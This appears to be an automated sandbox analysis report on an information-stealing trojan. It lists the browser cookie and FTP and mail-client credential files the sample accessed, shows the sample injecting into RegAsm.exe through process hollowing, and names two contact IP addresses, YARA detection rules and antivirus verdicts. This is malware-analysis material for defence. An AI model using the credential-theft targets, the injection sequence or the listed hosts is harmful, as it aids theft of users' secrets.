file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\manifest.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\lo\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\03019df3fd85a69a8ebd1facc6da9ba73e469774fe77f579fc5a08b8328c1d6b.sth\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\cs\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\ar\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\fr_CA\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\52\manifest.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\ka\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file C:\ProgramData\vcruntime140.dll
file C:\ProgramData\msvcp140.dll
file C:\ProgramData\nss3.dll
file C:\ProgramData\freebl3.dll
file C:\ProgramData\mozglue.dll
file C:\ProgramData\softokn3.dll
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000330
process_name: RegAsm.exe
process_identifier: 2640
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL×Ýc’¿à! &  @ àa0: Ð ˆ* Ð 0 ¨@ <   Ð.text„% & `P`.data|'@ (, @`À.rdatapDp FT @`@.bss(À €`À.edataˆ*Ð ,š @0@.idataÐ Æ @0À.CRT, Ô @0À.tls Ö @0À.rsrc¨0 Ø @0À.reloc<@ >Þ @0B/48€  @@B/19RȐ Ê" @B/31]'`(ì @B/45š-.@B/57\ À B@0B/70#ÐN@B/81
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"! 4pÐ Ëý @AH S› Ȑ xF P/  ð#”   ¤ @.text•  `.rdataÄ @@.data<F0  @À.00cfg€  @@.rsrcx  @@.relocð#  $" @B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL¤4cà"! ¶^À¹€ jª @A`ãWä·, ° P/0 ØAS¼øhРì¼ÜäZ.textaµ¶ `.rdata” Ð º@@.dataDàÄ@À.00cfg È@@.tls Ê@À.rsrc° Ì@@.relocØA0 BÖ@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ٓ1Cò_ò_ò_)n°Ÿò_”ŠÌ‹ò_ò^"ò_Ϛ^žò_Ϛ\•ò_Ϛ[Óò_ϚZÑò_Ϛ_œò_Ϛ œò_Ϛ]œò_Richò_PEL‚ê0]à"! (‚`Ù@ ð,à@Ag‚Ïèr ðœèA°¬=`x8¸w@päÀc@.text’&( `.dataH)@,@À.idata¬pD@@.didat4X@À.rsrcð Z@@.reloc¬=°>^@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELÐ4cà"! Ø.`£pl- @Aä&úÞÄ@Px P/`\°ð |Ê\€&@.text‰×Ø `.rdatalïððÜ@@.dataDRà.Ì@À.00cfg@ú@@.rsrcxPü@@.reloc\` @B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"! ÌðPÏSg@ADvS—wð°€ÀP/ÀÈ58qà {Œ.text&ËÌ `.rdataÔ«à¬Ð@@.data˜ |@À.00cfg „@@.rsrc€°†@@.relocÈ5À6Š@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $ÀÅäՄ¤Š†„¤Š†„¤Š†08e††¤Š†Ü†¤Š†„¤‹†¬¤Š†Ö̉‡—¤Š†Ö̎‡¤Š†Ö̏‡Ÿ¤Š†Ö̊‡…¤Š†ÖÌu†…¤Š†Ö̈‡…¤Š†Rich„¤Š†PEL|ê0]à"! ސÙð 0Ôm@Aàã ¸ŒúðA  € 8¸ @´.textôÜÞ `.dataôðâ@À.idata„ä@@.rsrcê@@.reloc  î@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELgßfà  <¾Z `@  `…lZO`ðF(&€ 4Y  H.textÄ: < `.rsrcð`>@@.reloc €D@B ZHpLÄ 9¨™£æ¢ª'Ü·+i鯕$ûB'ÖSF SÆ·1ŸgIk ª ʚ=ææâ?r»©½`uÏo’â+ðYýT§áʨ0HõÖÁ±ƒš}²ü¸›é礑 HÒb/v™¥‹A>½Pœ1ê;æ·'üATBÝ>#{Ìvˆânè„nÛED\åœÂ’S~x Z¶ sív„ÇõW ¯ 4( õŽ—~k|#5>~þZyšKêzêî¡­ä)L>«³«Jb~9œÍÎl˜;Â5yŠã[º…±NE‡âŸ.B¿VB1Òü#Z3ýŽn\­ ¥}:Óø‡ÔlÒ8ò¼ëeƒú(Mrü«ýÅڑ<uVÂǔ#j›"‡xÓ²E5µ2’e“$ü½V!EvŒ ênÊ(]~¡Ä$²r ÊÞ¶Ö±%‘¾LLÍ×qu —ЇKB ‰GžÈÒÀHm{f1Jñ™~ÕR蔫)zð‹›‘ñžû["êéÉl©?}݅Åq‹ÛÓ§gJ_®¹rÞÑ×f±öÏ*ß4o…Ó=¹á²ÙièÛ!sf{ûûj9N¡QäK!F>&¡`¶
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00030600', u'virtual_address': u'0x00002000', u'entropy': 7.990606337877378, u'name': u'.text', u'virtual_size': u'0x000304b4'} entropy 7.99060633788 description A section with a high entropy has been found
entropy 0.987244897959 description Overall entropy of this PE file is high
description Client_SW_User_Data_Stealer rule Client_SW_User_Data_Stealer
description ftp clients info stealer rule infoStealer_ftpClients_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 147.45.44.104
host 46.8.231.109
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 2371584
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001fc
1 0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $¢b›åæõ¶æõ¶æõ¶‰u^¶þõ¶‰uk¶ëõ¶‰u_¶Üõ¶ï{v¶åõ¶fzô·äõ¶ï{f¶áõ¶æô¶õ¶‰uZ¶ôõ¶‰uh¶çõ¶Richæõ¶PEL ×Þfà  ÈB"dà@0$@È©<à#|$àô.textJÆÈ à.rdataÞÎàÐÌ@@.data”+!° œ@À.reloc*Dà#F¨@B
base_address: 0x00400000
process_identifier: 2640
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

 buffer: LáA.?AVtype_info@@Næ@»±¿D        ! 5A CPR S WY l m pr €  ‚ ƒ„ ‘)ž ¡¤ § ·Î×   “ÿÿÿÿÿÿÿÿŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAC$÷A ÷A÷A÷A÷A÷A ÷A÷AüöAôöAèöAÜöAÔöAÈöAÄöAÀöA¼öA¸öA´öA°öA¬öA¨öA¤öA öAœöA˜öAöA„öA|öAtöA´öAlöAdöA\öAPöAHöA<öA0öA,öA(öAöAöAüõA ôõAìõAäõAÜõAÔõAÌõAÄõA´õA¤õA”õA€õAlõA\õAHõA@õA8õA0õA(õA õAõAõAõAõAøôAðôAèôAØôAÄôA¸ôA¬ôA õA ôA”ôA„ôApôA`ôALôA8ôA0ôA(ôAôAìóAØóA³B³B³B³B³BȺB¨øA0ýA°þA³Bx´B abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZXµB¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þÿÿÿÿ€ þÿÿÿ¬úA..ÀºBŒÈBŒÈBŒÈBŒÈBŒÈBŒÈBŒÈBŒÈBŒÈBĺBÈBÈBÈBÈBÈBÈBÈBȺB¨øAªúA.LáA.?AVlogic_error@std@@LáA.?AVlength_error@std@@LáA.?AVout_of_range@std@@LáA.?AVexception@std@@LáA.?AVbad_alloc@std@@
base_address: 0x0042b000
process_identifier: 2640
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2640
process_handle: 0x000001fc
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $¢b›åæõ¶æõ¶æõ¶‰u^¶þõ¶‰uk¶ëõ¶‰u_¶Üõ¶ï{v¶åõ¶fzô·äõ¶ï{f¶áõ¶æô¶õ¶‰uZ¶ôõ¶‰uh¶çõ¶Richæõ¶PEL ×Þfà  ÈB"dà@0$@È©<à#|$àô.textJÆÈ à.rdataÞÎàÐÌ@@.data”+!° œ@À.reloc*Dà#F¨@B
base_address: 0x00400000
process_identifier: 2640
process_handle: 0x000001fc
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
Process injection Process 2556 called NtSetContextThread to modify thread in remote process 2640
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 4061592
registers.edi: 0
registers.eax: 4285584
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001f8
process_identifier: 2640
1 0 0
Process injection Process 2556 resumed a thread in remote process 2640
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2640
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2556
1 0 0

NtResumeThread

 thread_handle: 0x00000158
suspend_count: 1
process_identifier: 2556
1 0 0

NtResumeThread

 thread_handle: 0x00000194
suspend_count: 1
process_identifier: 2556
1 0 0

CreateProcessInternalW

 thread_identifier: 2644
thread_handle: 0x000001f8
process_identifier: 2640
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000001fc
1 1 0

NtGetContextThread

 thread_handle: 0x000001f8
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 2371584
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001fc
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $¢b›åæõ¶æõ¶æõ¶‰u^¶þõ¶‰uk¶ëõ¶‰u_¶Üõ¶ï{v¶åõ¶fzô·äõ¶ï{f¶áõ¶æô¶õ¶‰uZ¶ôõ¶‰uh¶çõ¶Richæõ¶PEL ×Þfà  ÈB"dà@0$@È©<à#|$àô.textJÆÈ à.rdataÞÎàÐÌ@@.data”+!° œ@À.reloc*Dà#F¨@B
base_address: 0x00400000
process_identifier: 2640
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2640
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0041e000
process_identifier: 2640
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

 buffer: LáA.?AVtype_info@@Næ@»±¿D        ! 5A CPR S WY l m pr €  ‚ ƒ„ ‘)ž ¡¤ § ·Î×   “ÿÿÿÿÿÿÿÿŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAŽÈAC$÷A ÷A÷A÷A÷A÷A ÷A÷AüöAôöAèöAÜöAÔöAÈöAÄöAÀöA¼öA¸öA´öA°öA¬öA¨öA¤öA öAœöA˜öAöA„öA|öAtöA´öAlöAdöA\öAPöAHöA<öA0öA,öA(öAöAöAüõA ôõAìõAäõAÜõAÔõAÌõAÄõA´õA¤õA”õA€õAlõA\õAHõA@õA8õA0õA(õA õAõAõAõAõAøôAðôAèôAØôAÄôA¸ôA¬ôA õA ôA”ôA„ôApôA`ôALôA8ôA0ôA(ôAôAìóAØóA³B³B³B³B³BȺB¨øA0ýA°þA³Bx´B abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZXµB¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þÿÿÿÿ€ þÿÿÿ¬úA..ÀºBŒÈBŒÈBŒÈBŒÈBŒÈBŒÈBŒÈBŒÈBŒÈBĺBÈBÈBÈBÈBÈBÈBÈBȺB¨øAªúA.LáA.?AVlogic_error@std@@LáA.?AVlength_error@std@@LáA.?AVout_of_range@std@@LáA.?AVexception@std@@LáA.?AVbad_alloc@std@@
base_address: 0x0042b000
process_identifier: 2640
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0063e000
process_identifier: 2640
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2640
process_handle: 0x000001fc
1 1 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 4061592
registers.edi: 0
registers.eax: 4285584
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001f8
process_identifier: 2640
1 0 0

NtResumeThread

 thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2640
1 0 0
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Stelpak.4!c
Elastic malicious (high confidence)
Skyhigh Artemis!Trojan
Cylance Unsafe
Sangfor Trojan.Msil.Kryptik.Vbo2
BitDefender Gen:Variant.MSILHeracles.179021
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/GenKryptik.HBKB
APEX Malicious
Avast Win32:PWSX-gen [Trj]
Kaspersky HEUR:Trojan.MSIL.Stelpak.gen
Alibaba Trojan:MSIL/LummaC.3ed3ca64
MicroWorld-eScan Gen:Variant.MSILHeracles.179021
Rising Trojan.Kryptik!8.8 (CLOUD)
Emsisoft Gen:Variant.MSILHeracles.179021 (B)
F-Secure Trojan.TR/AD.Stealc.yngil
McAfeeD ti!E80E120DA347
FireEye Generic.mg.69f26c9e7dfc9364
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Google Detected
Avira TR/AD.Stealc.yngil
MAX malware (ai score=86)
Kingsoft MSIL.Trojan.Stelpak.gen
Gridinsoft Malware.Win32.Stealc.tr
Microsoft Trojan:MSIL/LummaC.AMAK!MTB
ZoneAlarm HEUR:Trojan.MSIL.Stelpak.gen
GData Win32.Trojan.Kryptik.3O9XPK
Varist W32/MSIL_Agent.IOD.gen!Eldorado
McAfee Artemis!69F26C9E7DFC
DeepInstinct MALICIOUS
Malwarebytes Trojan.Crypt
Ikarus Win32.Outbreak
TrendMicro-HouseCall Trojan.Win32.PRIVATELOADER.YXEIIZ
Tencent Win32.Trojan.FalseSign.Usmw
huorong Trojan/MSIL.Agent.li
Fortinet MSIL/Kryptik.MQ!tr
AVG Win32:PWSX-gen [Trj]
Paloalto generic.ml
CrowdStrike win/malicious_confidence_70% (D)